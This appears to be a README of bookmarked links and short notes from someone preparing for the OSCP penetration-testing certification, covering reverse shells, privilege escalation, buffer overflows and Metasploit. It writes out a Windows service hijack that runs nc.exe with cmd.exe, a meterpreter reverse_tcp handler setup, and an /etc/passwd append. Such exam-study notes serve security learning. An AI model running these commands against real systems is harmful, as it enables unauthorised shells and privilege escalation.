** This repo consists of important links (or URLs) which were bookmarked during my journey of OSCP Certification **
!! Note !!
** Most of the links are considered to be SPOLIERS :P !!!**
http://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet (for getting PHP reverse shell)
https://highon.coffee/blog/reverse-shell-cheat-sheet/
- Windows PE
http://www.fuzzysecurity.com/tutorials/16.html
- sc qc upnphost
- sc config upnphost binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
- sc config upnphost obj= ".\LocalSystem" password= ""
- sc qc upnphost
- net start upnphost
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
- Linux Kernel 2.6.22 < 3.9 --> Dirty Cow
https://www.exploit-db.com/exploits/40839/
https://www.youtube.com/watch?v=iyhbLeOzegM
Q) What is buffer-overflow
https://www.youtube.com/watch?v=TsQufuT80uc
# For Practicing (BO)
-
Vanilla EIP >> http://www.primalsecurity.net/0x0-exploit-tutorial-buffer-overflow-vanilla-eip-overwrite-2/
-
SL Mail >> https://www.youtube.com/watch?v=Pi51KlEulj4
https://gist.github.com/abhi3780/9ca5b778a128d6bd259b06efc273b78a
https://hashkiller.co.uk/md5-decrypter.aspx
use exploit/windows/dcerpc/ms03_026_dcom
https://pinboard.in/u:unfo/t:oscp
- Coldfusion
http://hatriot.github.io/blog/2014/04/02/lfi-to-stager-payload-in-coldfusion/
https://www.slideshare.net/chrisgates/coldfusion-for-penetration-testers
- msf>use exploit multi/handler
- msf>set payload windows/meterpreter/reverse_tcp
- msf>set lhost
- msf>set lport
- msf> set ExitOnSession false
- msf>exploit -j
echo "line:to:add" >> /etc/passwd
http://security-geek.in/2016/09/07/msfvenom-cheat-sheet/
https://kongwenbin.wordpress.com/tag/openfuck/
https://www.youtube.com/watch?v=G1i5oWblx9Q
https://www.rapid7.com/db/modules/exploit/multi/http/manageengine_auth_upload
https://www.rapid7.com/db/modules/exploit/linux/ftp/proftp_telnet_iac
https://www.exploit-db.com/exploits/16809/
http://www.suburbancomputer.com/tips_email.htm
https://www.ndchost.com/wiki/mail/test-smtp-auth-telnet
To be Cont.......